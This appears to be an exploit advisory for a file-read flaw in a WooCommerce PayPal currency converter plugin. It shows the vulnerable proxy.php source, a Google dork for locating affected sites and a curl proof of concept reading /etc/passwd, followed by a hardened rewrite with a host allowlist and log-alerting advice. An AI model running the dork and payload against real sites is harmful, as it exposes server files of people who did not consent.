# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: PayPal Currency Converter BASIC for WooCommerce
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:

<?php
// Fetches whatever path or URL the requrl parameter names; no validation at all
$file= file_get_contents($_GET['requrl']);
// Locate the converter result block inside the fetched content
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
// Print the selected slice of the fetched content back to the client
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included), so any HTML file can be loaded, and an attacker may be able
to read any local file that is not executed on the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url "http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd"
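The root cause is that proxy.php hands an unvalidated requrl straight to file_get_contents(), which accepts local paths and stream wrappers as readily as HTTP URLs. The following hardened rewrite is an added example for comparison; it is not the plugin's code and not part of the original advisory. It assumes the proxy only ever needs to fetch PayPal's currency-converter page, so the allowed host list and the fetch timeout are assumptions to adjust for the real upstream:

```php
<?php
// Hardened proxy.php, added here as an example (not the plugin's own code).
// ASSUMPTION: the only legitimate upstream is PayPal's converter page; adjust this list.
$allowed_hosts = ['www.paypal.com'];

$requrl = isset($_GET['requrl']) ? (string) $_GET['requrl'] : '';

// Accept only an absolute http(s) URL whose host is on the allowlist.
// Bare paths such as /etc/passwd have no scheme or host and are rejected here,
// as are php://, file://, data:// and similar wrappers.
$parts = parse_url($requrl);
if ($parts === false
    || !isset($parts['scheme'], $parts['host'])
    || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
    || !in_array(strtolower($parts['host']), $allowed_hosts, true)) {
    http_response_code(400);
    exit('invalid requrl');
}

// Fetch with a real HTTP client instead of file_get_contents(): restrict the
// protocols cURL may use and refuse redirects so the allowlist cannot be bypassed.
$ch = curl_init($requrl);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
    CURLOPT_TIMEOUT        => 10,   // assumption: tune for the real upstream
]);
$file = curl_exec($ch);
curl_close($ch);
if ($file === false) {
    http_response_code(502);
    exit('upstream fetch failed');
}

// Cut out the converter result as the original intended. The original passed
// strlen($file) - strpos(...) as the substr length, which is the distance from
// the meta input to the end of the document, not the width of the result block;
// the length is computed from the two offsets here instead.
$left  = strpos($file, '<div id=currency_converter_result>');
$right = strpos($file, '<input type=hidden name=meta');
if ($left === false || $right === false || $right <= $left) {
    http_response_code(502);
    exit('unexpected upstream response');
}
echo substr($file, $left, $right - $left);
```

With this in place a request carrying requrl=/etc/passwd is answered with a 400 and nothing is read from disk; only absolute URLs to the allowlisted host reach the fetch. Requests to proxy.php whose requrl lacks a scheme, or names a wrapper or a host outside the allowlist, are also a useful signal to alert on in web server logs while the plugin is still unpatched.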